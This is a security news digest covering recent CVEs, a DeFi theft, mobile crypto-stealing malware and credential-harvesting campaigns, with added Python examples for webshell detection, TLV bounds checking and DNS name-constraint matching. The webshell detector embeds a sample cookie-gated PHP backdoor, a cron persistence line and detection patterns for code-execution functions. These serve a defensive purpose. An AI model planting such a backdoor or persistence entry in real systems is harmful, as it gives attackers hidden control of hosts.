Originally reported by The Hacker News, Microsoft Security, SANS ISC, MSRC Security Updates
TL;DR
This week delivered a cascade of critical threats: Cisco released patches for CVSS 9.8 authentication bypass flaws, attackers drained $285 million from Drift Protocol using novel social engineering, and SparkCat malware returned to app stores targeting cryptocurrency recovery phrases.
The common thread: multiple critical vulnerabilities with CVSS 9.8 scores that require immediate patching, alongside active exploitation campaigns targeting mobile wallets and enterprise infrastructure.
Cisco addressed a severe authentication bypass vulnerability in its Integrated Management Controller (IMC) that allows unauthenticated remote attackers to gain elevated system access. The flaw, tracked as CVE-2026-20093, carries a CVSS score of 9.8 and affects the core authentication mechanism. Cisco also patched a related vulnerability in its Smart Software Manager (SSM) with similar severity. Organizations using Cisco IMC should prioritize immediate patching to prevent complete system compromise.
Solana-based decentralized exchange Drift Protocol confirmed attackers drained approximately $285 million through a sophisticated social engineering attack exploiting "durable nonces" on April 1, 2026. The attackers gained unauthorized access to Drift's Security Council administrative powers, enabling rapid protocol takeover. Security researchers have linked the attack methodology to North Korean threat actors, representing one of the largest DeFi exploits of 2026.
Cybersecurity researchers discovered a new variant of SparkCat malware infiltrating both the Apple App Store and Google Play Store, more than a year after its initial discovery. The trojan conceals itself within legitimate-appearing applications including enterprise messaging and food delivery services. This iteration specifically targets cryptocurrency wallet recovery phrase images, representing a direct threat to digital asset security. The malware's persistence across multiple app store security reviews demonstrates sophisticated evasion techniques.
Cisco Talos identified a large-scale credential harvesting operation exploiting the React2Shell vulnerability (CVE-2025-55182) to compromise 766 Next.js hosts. Attackers systematically extracted database credentials, SSH private keys, AWS secrets, shell command history, Stripe API keys, and GitHub tokens. The campaign demonstrates how web framework vulnerabilities can become vectors for enterprise-wide credential compromise.
SANS Internet Storm Center reported active exploitation attempts targeting exposed Vite development server installations via CVE-2025-30208. Vite, a popular frontend build tool, presents an attack surface when its development server remains reachable in production environments. Organizations should audit their development tool exposure and implement proper network segmentation.
Microsoft Security researchers detailed a sophisticated webshell technique using HTTP cookies to control PHP backdoors in Linux hosting environments. These cookie-gated webshells employ obfuscation, PHP-FPM execution, and cron-based persistence mechanisms to evade traditional detection methods. The technique demonstrates how threat actors are evolving beyond simple file-based webshells toward more subtle persistence mechanisms.
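As an added illustration of the detection side of the technique above (example code written for this digest, not Microsoft's own tooling or detections), the script below applies two heuristics to constructed inputs: it flags PHP source that reads `$_COOKIE` and also decodes and executes data, and it flags crontab entries that re-run the PHP interpreter against a file under a web document root. The indicator patterns, the web-root paths and the sample files are assumptions chosen for the example.

```python
import re

# Constructed sample inputs (not from the original article): a cookie-gated
# PHP backdoor next to a benign script that also reads a cookie, and two
# crontab lines, one of which re-runs a PHP file dropped under the web root.
SAMPLE_PHP_FILES = {
    "/var/www/html/uploads/.cache.php": (
        "<?php\n"
        "$k = $_COOKIE['sid'] ?? '';\n"
        "if ($k !== '') { @eval(base64_decode($k)); }\n"
    ),
    "/var/www/html/lang.php": (
        "<?php\n"
        "$lang = $_COOKIE['lang'] ?? 'en';\n"
        "echo htmlspecialchars($lang);\n"
    ),
}
SAMPLE_CRONTAB = (
    "*/5 * * * * /usr/bin/php /var/www/html/uploads/.cache.php >/dev/null 2>&1\n"
    "0 3 * * * /usr/bin/certbot renew\n"
)

# Heuristic indicator patterns; these are assumptions for the example, not
# the detections the researchers used.
COOKIE_INPUT = re.compile(r"\$_COOKIE\b")
DECODERS = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(")
EXECUTORS = re.compile(r"\b(eval|assert|system|shell_exec|passthru|exec|proc_open|popen)\s*\(")
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")


def scan_php_source(src: str) -> dict:
    """Report which indicator classes a PHP file contains and whether the
    combination looks like a cookie-gated webshell."""
    hits = {
        "reads_cookie": bool(COOKIE_INPUT.search(src)),
        "decodes_payload": bool(DECODERS.search(src)),
        "executes_code": bool(EXECUTORS.search(src)),
    }
    # Reading a cookie is normal. Reading a cookie in a file that also
    # executes dynamically supplied code is the combination worth triaging;
    # a decoder call on top of that raises confidence.
    hits["suspicious"] = hits["reads_cookie"] and hits["executes_code"]
    hits["confidence"] = "high" if hits["suspicious"] and hits["decodes_payload"] else (
        "medium" if hits["suspicious"] else "none")
    return hits


def scan_crontab(text: str) -> list:
    """Return crontab commands that run the PHP interpreter against a file
    located under a web document root (the persistence pattern above)."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # minute hour dom month dow command
        if len(fields) < 6:
            continue
        command = fields[5]
        if re.search(r"\bphp\b", command) and any(root in command for root in WEB_ROOTS):
            findings.append(command)
    return findings


def triage(php_files: dict, crontab: str) -> list:
    """Combine both checks: list suspicious PHP files and note whether a
    cron entry keeps each one alive."""
    cron_hits = scan_crontab(crontab)
    flagged = []
    for path, src in php_files.items():
        result = scan_php_source(src)
        result["cron_persisted"] = any(path in cmd for cmd in cron_hits)
        if result["suspicious"]:
            flagged.append((path, result))
    return flagged


if __name__ == "__main__":
    for path, result in triage(SAMPLE_PHP_FILES, SAMPLE_CRONTAB):
        print(path, result)
```

On a real host the same two functions would be fed the contents of files under the web root and the output of the system and per-user crontabs; cookie-reading alone is never a finding, which keeps the false-positive rate on ordinary session-handling code low.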
Microsoft reported threat actors are rapidly advancing from using AI as a tool to targeting AI systems as attack surfaces. Generative AI-enhanced phishing campaigns show 450% higher click-through rates compared to traditional methods. Additionally, attackers are industrializing multi-factor authentication bypass techniques using AI-generated social engineering content.
Microsoft disclosed CVE-2025-66038 in the OpenSC smart card library, where the sc_compacttlv_find_tag function can return out-of-bounds pointers. This vulnerability affects smart card authentication implementations across multiple platforms.
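To show the bounds check this class of bug is about, here is an added example (written for this digest, not OpenSC's code, and not a reproduction of the CVE) of walking ISO 7816-4 compact-TLV data, where each object is one byte whose high nibble is the tag and low nibble the value length, followed by that many value bytes. The checked walker refuses an object whose declared length runs past the buffer; the unchecked variant shows what a lookup without that check does. The sample byte strings are constructed.

```python
# Constructed samples (not from the article). In each, 0x31 is tag 3 with a
# 1-byte value, 0x42 is tag 4 with a 2-byte value, and 0xC3 is tag 0xC
# claiming a 3-byte value. The second sample is cut off inside that last object.
WELL_FORMED = bytes.fromhex("31 80 42 01 02 c3 aa bb cc")
TRUNCATED = bytes.fromhex("31 80 42 01 02 c3 ff")


def compact_tlv_objects(buf: bytes):
    """Yield (tag, value_offset, length) for each compact-TLV object in buf,
    raising instead of yielding an object whose value would extend past the end."""
    i = 0
    while i < len(buf):
        tag, length = buf[i] >> 4, buf[i] & 0x0F
        start, end = i + 1, i + 1 + length
        if end > len(buf):
            raise ValueError(
                f"object tag {tag:#x} at offset {i} declares {length} value bytes "
                f"but only {len(buf) - start} remain"
            )
        yield tag, start, length
        i = end


def find_compact_tlv(buf: bytes, tag: int):
    """Return the value bytes of the first object carrying `tag`, or None."""
    for t, start, length in compact_tlv_objects(buf):
        if t == tag:
            return buf[start:start + length]
    return None


def find_compact_tlv_unchecked(buf: bytes, tag: int):
    """The same lookup without the length check. Python slicing silently
    truncates, so this returns a short value; the equivalent C code would
    hand back a pointer and length that extend past the buffer."""
    i = 0
    while i < len(buf):
        t, length = buf[i] >> 4, buf[i] & 0x0F
        if t == tag:
            return buf[i + 1:i + 1 + length]
        i += 1 + length
    return None


def lookup_status(buf: bytes, tag: int) -> str:
    """Classify a lookup as 'found', 'absent' or 'malformed' so callers can
    treat a truncated buffer as an error rather than as data."""
    try:
        value = find_compact_tlv(buf, tag)
    except ValueError:
        return "malformed"
    return "found" if value is not None else "absent"


if __name__ == "__main__":
    print(find_compact_tlv(WELL_FORMED, 0xC).hex())          # aabbcc
    print(find_compact_tlv_unchecked(TRUNCATED, 0xC).hex())  # ff (1 byte, 3 claimed)
    print(lookup_status(TRUNCATED, 0xC))                     # malformed
```

Note that the checked walker still returns tag 4 from the truncated sample, because that object is complete; only a lookup that reaches the cut-off object fails, which is the behaviour a caller parsing ATR historical bytes or a card's EF.ATR wants.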
The Python cryptography library received patches for CVE-2026-34073, addressing incomplete DNS name constraint enforcement on peer names. This flaw could allow certificate validation bypasses in certain configurations.
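To make concrete what DNS name constraint enforcement has to get right, the following added example (written for this digest; it is not the cryptography library's code and does not reproduce the specific flaw behind the CVE) implements the RFC 5280 section 4.2.1.10 rule that a dNSName is inside a constraint subtree only when the constraint's labels are exactly its right-most labels, and sets it beside a plain string-suffix shortcut that over-accepts. The hostnames and constraint lists are constructed; only dNSName constraints are modelled.

```python
def _labels(name: str) -> list:
    """Split a DNS name into lower-cased labels, ignoring a trailing dot."""
    return name.lower().rstrip(".").split(".")


def dns_name_in_subtree(name: str, constraint: str) -> bool:
    """RFC 5280 4.2.1.10: a dNSName satisfies a constraint when it can be
    formed by adding zero or more labels to the left of the constraint."""
    n, c = _labels(name), _labels(constraint)
    return len(n) >= len(c) and n[-len(c):] == c


def endswith_check(name: str, constraint: str) -> bool:
    """A string-suffix check, the kind of shortcut that over-accepts:
    'badexample.com' ends with 'example.com' but is not in that subtree."""
    return name.lower().endswith(constraint.lower())


def peer_name_allowed(peer_name: str, permitted: list, excluded: list) -> bool:
    """Apply permittedSubtrees and excludedSubtrees (dNSName entries only,
    an assumption of this example) to the DNS name a peer is verified as.
    An excluded match always rejects; an empty permitted list imposes no
    restriction, while a non-empty one requires at least one match."""
    if any(dns_name_in_subtree(peer_name, c) for c in excluded):
        return False
    if permitted and not any(dns_name_in_subtree(peer_name, c) for c in permitted):
        return False
    return True


if __name__ == "__main__":
    # Constructed cases: the suffix shortcut accepts a sibling domain that the
    # label-based rule correctly rejects.
    for host in ("www.example.com", "example.com", "badexample.com"):
        print(host, endswith_check(host, "example.com"), dns_name_in_subtree(host, "example.com"))
    print(peer_name_allowed("db.internal.example.com", ["example.com"], ["internal.example.com"]))
```

The label comparison, rather than a suffix comparison, is the whole point: an intermediate CA constrained to `example.com` must not be able to issue for `badexample.com`, and the same comparison has to be applied to the name the peer is actually verified against, not only to the names listed in the leaf certificate.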
Microsoft patched CVE-2026-32213 in Azure AI Foundry, an elevation of privilege vulnerability allowing unauthorized network-based privilege escalation due to improper authorization controls.
Chromium addressed CVE-2026-5289, a use-after-free vulnerability in the navigation component that affects Microsoft Edge and other Chromium-based browsers.